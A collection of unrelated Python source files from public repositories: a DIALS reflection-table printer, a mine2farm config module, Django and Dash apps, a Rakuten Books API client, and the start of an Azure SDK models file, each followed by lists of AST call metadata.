"kapton_absorption_correction": "%.3f", "kapton_absorption_correction_sigmas": "%.3f", "inverse_scale_factor": "%.3f", "inverse_scale_factor_variance": "%.3f", } for rlist in reflections: from dials.algorithms.shoebox import MaskCode foreground_valid = MaskCode.Valid | MaskCode.Foreground text.append("") text.append(f"Reflection list contains {len(rlist)} reflections") if len(rlist) == 0: continue rows = [["Column", "min", "max", "mean"]] for k, col in rlist.cols(): if k in formats and "%" not in formats.get(k, "%s"): # Allow blanking out of entries that wouldn't make sense rows.append( [ k, formats.get(k, "%s"), formats.get(k, "%s"), formats.get(k, "%s"), ] ) elif type(col) in (flex.double, flex.int, flex.size_t): if type(col) in (flex.int, flex.size_t): col = col.as_double() rows.append( [ k, formats.get(k, "%s") % flex.min(col), formats.get(k, "%s") % flex.max(col), formats.get(k, "%s") % flex.mean(col), ] ) elif type(col) in (flex.vec3_double, flex.miller_index): if isinstance(col, flex.miller_index): col = col.as_vec3_double() rows.append( [ k, formats.get(k, "%s") % col.min(), formats.get(k, "%s") % col.max(), formats.get(k, "%s") % col.mean(), ] ) elif isinstance(col, flex.shoebox): rows.append([k, "", "", ""]) si = col.summed_intensity().observed_value() rows.append( [ " summed I", formats.get(k, "%s") % flex.min(si), formats.get(k, "%s") % flex.max(si), formats.get(k, "%s") % flex.mean(si), ] ) x1, x2, y1, y2, z1, z2 = col.bounding_boxes().parts() bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double() rows.append( [ " N pix", formats.get(k, "%s") % flex.min(bbox_sizes), formats.get(k, "%s") % flex.max(bbox_sizes), formats.get(k, "%s") % flex.mean(bbox_sizes), ] ) fore_valid = col.count_mask_values(foreground_valid).as_double() rows.append( [ " N valid foreground pix", formats.get(k, "%s") % flex.min(fore_valid), formats.get(k, "%s") % flex.max(fore_valid), formats.get(k, "%s") % flex.mean(fore_valid), ] ) text.append(tabulate(rows, headers="firstrow")) if show_flags: text.append(_create_flag_count_table(rlist)) if show_identifiers: if rlist.experiment_identifiers(): text.append( """Experiment identifiers id-map values:\n%s""" % ( "\n".join( "id:" + str(k) + " -> experiment identifier:" + str(rlist.experiment_identifiers()[k]) for k in rlist.experiment_identifiers().keys() ) ) ) intensity_keys = ( "miller_index", "d", "intensity.prf.value", "intensity.prf.variance", "intensity.sum.value", "intensity.sum.variance", "background.mean", "profile.correlation", "profile.rmsd", ) profile_fit_keys = ("miller_index", "d") centroid_keys = ( "miller_index", "d", "xyzcal.mm", "xyzcal.px", "xyzobs.mm.value", "xyzobs.mm.variance", "xyzobs.px.value", "xyzobs.px.variance", ) keys_to_print = OrderedSet() if show_intensities: for k in intensity_keys: keys_to_print.add(k) if show_profile_fit: for k in profile_fit_keys: keys_to_print.add(k) if show_centroids: for k in centroid_keys: keys_to_print.add(k) if show_all_reflection_data: for k in formats: keys_to_print.add(k) def format_column(key, data, format_strings=None): if isinstance(data, flex.vec3_double): c_strings = [ c.as_string(format_strings[i].strip()) for i, c in enumerate(data.parts()) ] elif isinstance(data, flex.miller_index): c_strings = [ c.as_string(format_strings[i].strip()) for i, c in enumerate(data.as_vec3_double().parts()) ] elif isinstance(data, flex.size_t): c_strings = [data.as_int().as_string(format_strings[0].strip())] elif isinstance(data, flex.shoebox): x1, x2, y1, y2, z1, z2 = data.bounding_boxes().parts() bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double() c_strings = [bbox_sizes.as_string(format_strings[0].strip())] key += " (N pix)" else: c_strings = [data.as_string(format_strings[0].strip())] column = flex.std_string() max_element_lengths = [c.max_element_length() for c in c_strings] for i in range(len(c_strings[0])): column.append( f"%{len(key)}s" % ", ".join( ("%%%is" % max_element_lengths[j]) % c_strings[j][i] for j in range(len(c_strings)) ) ) return column if keys_to_print: keys = [k for k in keys_to_print if k in rlist] if max_reflections is not None: max_reflections = min(len(rlist), max_reflections) else: max_reflections = len(rlist) columns = [] for k in keys: columns.append( format_column(k, rlist[k], format_strings=formats[k].split(",")) ) text.append("") text.append("Printing %i of %i reflections:" % (max_reflections, len(rlist))) line = [] for j in range(len(columns)): key = keys[j] if key == "shoebox": key += " (N pix)" width = max(len(key), columns[j].max_element_length()) line.append("%%%is" % width % key) text.append(" ".join(line)) for i in range(max_reflections): line = (c[i] for c in columns) text.append(" ".join(line)) return "\n".join(text) if __name__ == "__main__": run()
[((193, 13, 201, 5), 'dials.util.options.OptionParser', 'OptionParser', (), '', False, 'from dials.util.options import OptionParser, reflections_and_experiments_from_files\n'), ((204, 31, 206, 5), 'dials.util.options.reflections_and_experiments_from_files', 'reflections_and_experiments_from_files', ({(205, 8, 205, 32): 'params.input.reflections', (205, 34, 205, 58): 'params.input.experiments'}, {}), '(params.input.reflections, params.\n input.experiments)', False, 'from dials.util.options import OptionParser, reflections_and_experiments_from_files\n'), ((609, 20, 609, 32), 'orderedset.OrderedSet', 'OrderedSet', ({}, {}), '()', False, 'from orderedset import OrderedSet\n'), ((384, 14, 384, 46), 'numpy.sum', 'np.sum', ({(384, 21, 384, 45): '(numpy_flags & value != 0)'}, {}), '(numpy_flags & value != 0)', True, 'import numpy as np\n'), ((414, 16, 414, 55), 'dials.util.tabulate', 'tabulate', (), '', False, 'from dials.util import Sorry, tabulate\n'), ((645, 17, 645, 34), 'dials.array_family.flex.std_string', 'flex.std_string', ({}, {}), '()', False, 'from dials.array_family import flex\n'), ((214, 12, 214, 57), 'sys.exit', 'sys.exit', ({(214, 21, 214, 56): '"""Error: experiment has no detector"""'}, {}), "('Error: experiment has no detector')", False, 'import sys\n'), ((216, 12, 216, 53), 'sys.exit', 'sys.exit', ({(216, 21, 216, 52): '"""Error: experiment has no beam"""'}, {}), "('Error: experiment has no beam')", False, 'import sys\n'), ((320, 14, 322, 9), 'dials.util.Sorry', 'Sorry', ({(321, 12, 321, 81): 'f"""Unable to read image data. Please check {e.filename} is accessible"""'}, {}), "(f'Unable to read image data. Please check {e.filename} is accessible')", False, 'from dials.util import Sorry, tabulate\n'), ((337, 18, 337, 48), 'scitbx.math.five_number_summary', 'five_number_summary', ({(337, 38, 337, 47): 'flat_data'}, {}), '(flat_data)', False, 'from scitbx.math import five_number_summary\n'), ((359, 20, 359, 52), 'dials.util.tabulate', 'tabulate', (), '', False, 'from dials.util import Sorry, tabulate\n'), ((564, 20, 564, 54), 'dials.util.tabulate', 'tabulate', (), '', False, 'from dials.util import Sorry, tabulate\n'), ((279, 22, 279, 40), 'dials.array_family.flex.vec3_double', 'flex.vec3_double', ({}, {}), '()', False, 'from dials.array_family import flex\n'), ((280, 25, 280, 43), 'dials.array_family.flex.vec3_double', 'flex.vec3_double', ({}, {}), '()', False, 'from dials.array_family import flex\n'), ((294, 33, 294, 79), 'cctbx.uctbx.unit_cell', 'uctbx.unit_cell', ({(294, 49, 294, 78): '(a, b, c, alpha, beta, gamma)'}, {}), '((a, b, c, alpha, beta, gamma))', False, 'from cctbx import uctbx\n'), ((517, 47, 517, 60), 'dials.array_family.flex.min', 'flex.min', ({(517, 56, 517, 59): 'col'}, {}), '(col)', False, 'from dials.array_family import flex\n'), ((518, 47, 518, 60), 'dials.array_family.flex.max', 'flex.max', ({(518, 56, 518, 59): 'col'}, {}), '(col)', False, 'from dials.array_family import flex\n'), ((519, 47, 519, 61), 'dials.array_family.flex.mean', 'flex.mean', ({(519, 57, 519, 60): 'col'}, {}), '(col)', False, 'from dials.array_family import flex\n'), ((539, 47, 539, 59), 'dials.array_family.flex.min', 'flex.min', ({(539, 56, 539, 58): 'si'}, {}), '(si)', False, 'from dials.array_family import flex\n'), ((540, 47, 540, 59), 'dials.array_family.flex.max', 'flex.max', ({(540, 56, 540, 58): 'si'}, {}), '(si)', False, 'from dials.array_family import flex\n'), ((541, 47, 541, 60), 'dials.array_family.flex.mean', 'flex.mean', ({(541, 57, 541, 59): 'si'}, {}), '(si)', False, 'from dials.array_family import flex\n'), ((549, 47, 549, 67), 'dials.array_family.flex.min', 'flex.min', ({(549, 56, 549, 66): 'bbox_sizes'}, {}), '(bbox_sizes)', False, 'from dials.array_family import flex\n'), ((550, 47, 550, 67), 'dials.array_family.flex.max', 'flex.max', ({(550, 56, 550, 66): 'bbox_sizes'}, {}), '(bbox_sizes)', False, 'from dials.array_family import flex\n'), ((551, 47, 551, 68), 'dials.array_family.flex.mean', 'flex.mean', ({(551, 57, 551, 67): 'bbox_sizes'}, {}), '(bbox_sizes)', False, 'from dials.array_family import flex\n'), ((558, 47, 558, 67), 'dials.array_family.flex.min', 'flex.min', ({(558, 56, 558, 66): 'fore_valid'}, {}), '(fore_valid)', False, 'from dials.array_family import flex\n'), ((559, 47, 559, 67), 'dials.array_family.flex.max', 'flex.max', ({(559, 56, 559, 66): 'fore_valid'}, {}), '(fore_valid)', False, 'from dials.array_family import flex\n'), ((560, 47, 560, 68), 'dials.array_family.flex.mean', 'flex.mean', ({(560, 57, 560, 67): 'fore_valid'}, {}), '(fore_valid)', False, 'from dials.array_family import flex\n')]
OuissalTAIM/jenkins
app/config/env_jesa.py
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
# -*- coding: utf-8 -*- from enum import Enum, IntEnum, unique import os APP_NAME = "mine2farm" NETWORK_NAME = "CenterAxis" LOG_LEVEL_CONSOLE = "WARNING" LOG_LEVEL_FILE = "INFO" APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/") LOG_FOLDER = APP_FOLDER + "app/log/" LOG_FILE = "%(asctime)_" + APP_NAME + ".log" OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/") CANVAS_URL = "http://127.0.0.1/canvas.xlsm" # DB DB_NAME = None DB_HOST = "172.29.161.208" DB_PORT = 5006 DATA_SERVICE_ADD = "172.29.161.208" DATA_SERVICE_PORT = 5001 # Results DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None DB_DETAILED_RESULT_COLLECTION_NAME = "detailed" DB_GLOBAL_RESULT_COLLECTION_NAME = "global" DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best" DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best" DB_SENSITIVITY_COLLECTION_NAME = "sensitivity" RESULT_BATCHES_SIZE = 25 HEAD_DATA_BITS = 17 DB_NAME_BITS = 20 RANDOMIZE_RESULTS = False # RabbitMQ RABBITMQ_SERVER = "localhost" RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE" RABBITMQ_CYCLE = 3 RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL" RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL" RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin" # Memcached MEMCACHED_SERVER = 'localhost' MEMCACHED_PORT = 11211 # Dashboard DB_LOAD_FROM_SERVICE = True # Monitoring MONITORING_APP_NAME = "mine2farm_monitor" MONITORING_SERVER = "172.29.161.208" MONITORING_PORT = 5002 MONITORING_DB_NAME = "task_history" MONITORING_COLLECTION_HISTORY_NAME = "task" MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history" MONITORING_STEP = 1 MONITORING_NB_PAGE = 10 # Mongodb-bi MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin" # Mongodb MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin" # params LOGISTICS_LP = False MODE_DEBUG = False GRANUL_RELAX = False class HTML_STATUS(IntEnum): ERROR = -1 OK = 0 # Model MONIKER_SEPARATOR = "/" WACC = 0.1 T0 = 2020 TMAX = 2031 class PriceParams(Enum): WACC = 0 TENOR = 1 VOLUME = 2 class PipelineType(Enum): COMMON = 0 PRODUCER = 1 TRANSPORT = 2 BALANCE = 3 PRICE = 4 SALES = 5 @unique class PipelineLayer(IntEnum): UNDEFINED = -1 MINE = 0 BENEFICIATION = 1 SAP = 2 PAP = 3 GRANULATION = 4 LOGISTICS = 5 RAW_MATERIALS = 8 COMMON = 9 SALES_PLAN = 10 MINE_BENEFICIATION = 11 UNIT_CONVERSION_MATRIX = 12 PIPELINE_SCHEMA = { PipelineLayer.COMMON: { "type": PipelineType.COMMON, "dico": ["location", "opex", "unit", "currency", "output", "names", "products"] }, PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"], "options": "mining_options", "production": "mining_specific_production", "opex": "mining_opex___specific_consumptions", "capex": "mining_capex", "priority_mines": "prioritymines" }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"], "options": "beneficiation_options", "production": "beneficiation_production", "opex": "beneficiation_opex___specific_consumptions", "capex": "beneficiation_capex" }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"], "options": "sap___power_plant_options", "production": "sap___power_plant_production", "opex": "sap___power_plant_opex___specific_consumptions", "capex": "sap___power_plant_capex", "product_type": "sap.product" }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"], "options": "pap_options", "production": "pap_production", "opex": "pap_opex___specific_consumptions", "capex": "pap_capex", "product_type": "pap.product" }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"], "options": "granulation_options", "production": "granulation_production", "opex": "granulation_opex", "capex": "granulation_capex" }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"], "options": "logistics_options", "production": None, "opex": "logistics_opex", "capex": "logistics_capex" }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "data": "raw_materials" }, PipelineLayer.SALES_PLAN: { "type": PipelineType.SALES, "data": "sales_plan" }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": PipelineType.COMMON, "data": "conv_matrix" }, } SUPPLY_CHAIN = "mine2port" DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE), "sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)} COMBO_NODES = { PipelineLayer.MINE_BENEFICIATION: { "url": "mining_wp_connections", "upstream_layer": PipelineLayer.MINE, "downstream_layer": PipelineLayer.BENEFICIATION } } COMBO_NODES_SEPARATION = "--" class FunctionType(Enum): COST_PV = 0 CASH_COST = 1 FULL_COST = 2 class ScenarioGeneratorType(IntEnum): FROM_PATHS = 0 FROM_OPTIONS = 1 SPECIFIC_SCENARIOS = 2 SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS PIPELINE_METADATA = { PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "production": ["Name", "Extraction", "Quality", "Unit"], "opex": ["Name", "Extraction", "Capacity", "Item", "Unit"], "capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"], "opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"], "capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "production": ["Location", "Process", "Product", "Unit"], "opex": ["Location", "Process", "Item", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"], "capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"], "capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "columns": ["Item", "Unit"] }, PipelineLayer.SALES_PLAN: { "type": PipelineType.PRICE, "columns": ["Type", "Product", "Unit"] }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": PipelineType.COMMON, "columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"] }, } class ShuffleLevel(IntEnum): UNDEFINED = 0 SHUFFLE_WITHOUT_PERM = 1 SHUFFLE_WITH_PERMUTATIONS = 2 SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3 SHUFFLE_WITH_UNNAMED = 4 SHUFFLE_LEVELS = { PipelineLayer.MINE: ShuffleLevel.UNDEFINED, PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED, PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED, PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED, PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED }
[((12, 13, 12, 71), 'os.getenv', 'os.getenv', ({(12, 23, 12, 44): '"""JESA_MINE2FARM_HOME"""', (12, 46, 12, 70): '"""C:/GitRepos/mine2farm/"""'}, {}), "('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')", False, 'import os\n')]
cankush625/Django
myFirstApp/travello/models.py
a3e874a69fbf34bf9123a7d60697a2449c7591c6
from django.db import models # Create your models here. class Destination(models.Model) : name = models.CharField(max_length = 100) img = models.ImageField(upload_to = 'pics') desc = models.TextField() price = models.IntegerField() offer = models.BooleanField(default = False) class News() : id : int img : str date : int month : str headline : str category : str desc : str
[((6, 11, 6, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((7, 10, 7, 47), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import models\n'), ((8, 11, 8, 29), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((9, 12, 9, 33), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import models\n'), ((10, 12, 10, 48), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n')]
Moustique-bot/hands-on-2021
app/app.py
fd023f0a431f72ef2c48e3a469be42e2de9e2957
import base64 import io import dash import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc from dash.dependencies import Input, Output import numpy as np import tensorflow as tf from PIL import Image from constants import CLASSES import yaml with open('app.yaml') as yaml_data : params = yaml.safe_load(yaml_data) IMAGE_WIDTH = params['IMAGE_WIDTH'] IMAGE_HEIGHT = params['IMAGE_HEIGHT'] PATH_MODEL = params['PATH_MODEL'] # Load DNN model classifier = tf.keras.models.load_model(PATH_MODEL) def classify_image(image, model, image_box=None): """Classify image by model Parameters ---------- content: image content model: tf/keras classifier Returns ------- class id returned by model classifier """ images_list = [] image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box) # box argument clips image to (x1, y1, x2, y2) image = np.array(image) images_list.append(image) return model.predict_classes(np.array(images_list)) app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP]) pre_style = { 'whiteSpace': 'pre-wrap', 'wordBreak': 'break-all', 'whiteSpace': 'normal' } # Define application layout navbar = dbc.NavbarSimple( children=[ dbc.DropdownMenu( children=[ dbc.DropdownMenuItem('Réseau de Neurones', header=True), dbc.DropdownMenuItem('SVM', href="#"), ], nav=True, in_navbar=True, label='Modèle', ), ], brand="Menu", brand_href="#", color= "#d90054", dark=True ) cards = html.Div( [ dbc.Card( dbc.CardBody( [ html.H5("Présentation", className="card-title"), html.P( [ 'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.', ], className='card-text', ), ] ), className='w-75 mb-3', color='#f1cbd1', outline='Black', style={ 'margin-top': '75px', 'margin-left': '185px'}, ), ] ) app.layout = html.Div([ html.Div([navbar]), html.Div(cards), dcc.Upload( id='bouton-chargement', children=html.Div([ 'Cliquer-déposer ou ', html.A('sélectionner une image') ]), style={ 'width': '50%', 'height': '60px', 'lineHeight': '60px', 'borderWidth': '1px', 'borderStyle': 'dashed', 'borderRadius': '5px', 'textAlign': 'center', 'margin-top': '75px', 'margin-left': '370px', } ), html.Div(id='mon-image'), html.Div(id='ma-zone-resultat') ]) @app.callback(Output('mon-image', 'children'), [Input('bouton-chargement', 'contents')]) def update_output(contents): if contents is not None: content_type, content_string = contents.split(',') if 'image' in content_type: image = Image.open(io.BytesIO(base64.b64decode(content_string))) predicted_class = classify_image(image, classifier)[0] return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src=contents, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), #html.Div('Raw Content'), #html.Pre(contents, style=pre_style) ]) else: try: # Décodage de l'image transmise en base 64 (cas des fichiers ppm) # fichier base 64 --> image PIL image = Image.open(io.BytesIO(base64.b64decode(content_string))) # image PIL --> conversion PNG --> buffer mémoire buffer = io.BytesIO() image.save(buffer, format='PNG') # buffer mémoire --> image base 64 buffer.seek(0) img_bytes = buffer.read() content_string = base64.b64encode(img_bytes).decode('ascii') # Appel du modèle de classification predicted_class = classify_image(image, classifier)[0] # Affichage de l'image return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), ]) except: return html.Div([ html.Hr(), html.Div('Uniquement des images svp : {}'.format(content_type)), html.Hr(), html.Div('Raw Content'), html.Pre(contents, style=pre_style) ]) # Manage interactions with callbacks @app.callback( Output(component_id='ma-zone-resultat', component_property='children'), [Input(component_id='mon-champ-texte', component_property='value')] ) def update_output_div(input_value): return html.H3('Valeur saisie ici "{}"'.format(input_value)) # Start the application if __name__ == '__main__': app.run_server(debug=True)
[((26, 13, 26, 51), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', ({(26, 40, 26, 50): 'PATH_MODEL'}, {}), '(PATH_MODEL)', True, 'import tensorflow as tf\n'), ((49, 6, 49, 89), 'dash.Dash', 'dash.Dash', (), '', False, 'import dash\n'), ((18, 13, 18, 38), 'yaml.safe_load', 'yaml.safe_load', ({(18, 28, 18, 37): 'yaml_data'}, {}), '(yaml_data)', False, 'import yaml\n'), ((43, 10, 43, 25), 'numpy.array', 'np.array', ({(43, 19, 43, 24): 'image'}, {}), '(image)', True, 'import numpy as np\n'), ((130, 14, 130, 45), 'dash.dependencies.Output', 'Output', ({(130, 21, 130, 32): '"""mon-image"""', (130, 34, 130, 44): '"""children"""'}, {}), "('mon-image', 'children')", False, 'from dash.dependencies import Input, Output\n'), ((179, 4, 179, 74), 'dash.dependencies.Output', 'Output', (), '', False, 'from dash.dependencies import Input, Output\n'), ((46, 31, 46, 52), 'numpy.array', 'np.array', ({(46, 40, 46, 51): 'images_list'}, {}), '(images_list)', True, 'import numpy as np\n'), ((105, 4, 105, 22), 'dash_html_components.Div', 'html.Div', ({(105, 13, 105, 21): '[navbar]'}, {}), '([navbar])', True, 'import dash_html_components as html\n'), ((107, 4, 107, 19), 'dash_html_components.Div', 'html.Div', ({(107, 13, 107, 18): 'cards'}, {}), '(cards)', True, 'import dash_html_components as html\n'), ((126, 4, 126, 28), 'dash_html_components.Div', 'html.Div', (), '', True, 'import dash_html_components as html\n'), ((127, 4, 127, 35), 'dash_html_components.Div', 'html.Div', (), '', True, 'import dash_html_components as html\n'), ((131, 15, 131, 53), 'dash.dependencies.Input', 'Input', ({(131, 21, 131, 40): '"""bouton-chargement"""', (131, 42, 131, 52): '"""contents"""'}, {}), "('bouton-chargement', 'contents')", False, 'from dash.dependencies import Input, Output\n'), ((180, 5, 180, 70), 'dash.dependencies.Input', 'Input', (), '', False, 'from dash.dependencies import Input, Output\n'), ((152, 25, 152, 37), 'io.BytesIO', 'io.BytesIO', ({}, {}), '()', False, 'import io\n'), ((85, 20, 85, 68), 'dash_html_components.H5', 'html.H5', (), '', True, 'import dash_html_components as html\n'), ((86, 20, 91, 21), 'dash_html_components.P', 'html.P', (), '', True, 'import dash_html_components as html\n'), ((136, 42, 136, 74), 'base64.b64decode', 'base64.b64decode', ({(136, 59, 136, 73): 'content_string'}, {}), '(content_string)', False, 'import base64\n'), ((139, 16, 139, 53), 'dash_html_components.Hr', 'html.Hr', (), '', True, 'import dash_html_components as html\n'), ((140, 16, 140, 70), 'dash_html_components.Img', 'html.Img', (), '', True, 'import dash_html_components as html\n'), ((142, 16, 142, 25), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((66, 16, 66, 72), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (), '', True, 'import dash_bootstrap_components as dbc\n'), ((67, 16, 67, 53), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (), '', True, 'import dash_bootstrap_components as dbc\n'), ((112, 20, 112, 53), 'dash_html_components.A', 'html.A', ({(112, 27, 112, 52): '"""sélectionner une image"""'}, {}), "('sélectionner une image')", True, 'import dash_html_components as html\n'), ((150, 46, 150, 78), 'base64.b64decode', 'base64.b64decode', ({(150, 63, 150, 77): 'content_string'}, {}), '(content_string)', False, 'import base64\n'), ((157, 33, 157, 60), 'base64.b64encode', 'base64.b64encode', ({(157, 50, 157, 59): 'img_bytes'}, {}), '(img_bytes)', False, 'import base64\n'), ((162, 20, 162, 57), 'dash_html_components.Hr', 'html.Hr', (), '', True, 'import dash_html_components as html\n'), ((163, 20, 163, 107), 'dash_html_components.Img', 'html.Img', (), '', True, 'import dash_html_components as html\n'), ((165, 20, 165, 29), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((169, 20, 169, 29), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((171, 20, 171, 29), 'dash_html_components.Hr', 'html.Hr', ({}, {}), '()', True, 'import dash_html_components as html\n'), ((172, 20, 172, 43), 'dash_html_components.Div', 'html.Div', ({(172, 29, 172, 42): '"""Raw Content"""'}, {}), "('Raw Content')", True, 'import dash_html_components as html\n'), ((173, 20, 173, 55), 'dash_html_components.Pre', 'html.Pre', (), '', True, 'import dash_html_components as html\n')]
NobukoYano/LibraryApp
books/rakutenapi.py
623f60614f15ab760e1c0d2f18954ce948f2d2a3
import json import requests from django.conf import settings class rakuten: def get_json(self, isbn: str) -> dict: appid = settings.RAKUTEN_APP_ID # API request template api = "https://app.rakuten.co.jp/services/api/BooksTotal/"\ "Search/20170404?format=json&isbnjan={isbnjan}&"\ "applicationId={appid}" # format get api URL url = api.format(isbnjan=isbn, appid=appid) # execute r = requests.get(url) # decode to json # Check the status code status_code = r.status_code if status_code != 200: # if failed return None data = json.loads(r.text) if data['count'] == 0: return None json_data = {} json_data['isbn'] = data['Items'][0]['Item']['isbn'] json_data['title'] = data['Items'][0]['Item']['title'] json_data['publisher'] = data['Items'][0]['Item']['publisherName'] json_data['pubdate'] = data['Items'][0]['Item']['salesDate'] json_data['cover'] = data['Items'][0]['Item']['largeImageUrl'] json_data['author'] = data['Items'][0]['Item']['author'] return json_data
[((21, 12, 21, 29), 'requests.get', 'requests.get', ({(21, 25, 21, 28): 'url'}, {}), '(url)', False, 'import requests\n'), ((30, 15, 30, 33), 'json.loads', 'json.loads', ({(30, 26, 30, 32): 'r.text'}, {}), '(r.text)', False, 'import json\n')]
naumoff0/Archive
Random-Programs/optimization/root/v4.py
d4ad2da89abb1576dd5a7c72ded6bf9b45c3f610
print(int(input(""))**0.5)
[]
rsdoherty/azure-sdk-for-python
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
6bba5326677468e6660845a703686327178bb7b1
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, List, Optional from azure.core.exceptions import HttpResponseError import msrest.serialization class ErrorAdditionalInfo(msrest.serialization.Model): """The resource management error additional info. Variables are only populated by the server, and will be ignored when sending a request. :ivar type: The additional info type. :vartype type: str :ivar info: The additional info. :vartype info: any """ _validation = { 'type': {'readonly': True}, 'info': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'info': {'key': 'info', 'type': 'object'}, } def __init__( self, **kwargs ): super(ErrorAdditionalInfo, self).__init__(**kwargs) self.type = None self.info = None class ErrorDetail(msrest.serialization.Model): """The error detail. Variables are only populated by the server, and will be ignored when sending a request. :ivar code: The error code. :vartype code: str :ivar message: The error message. :vartype message: str :ivar target: The error target. :vartype target: str :ivar details: The error details. :vartype details: 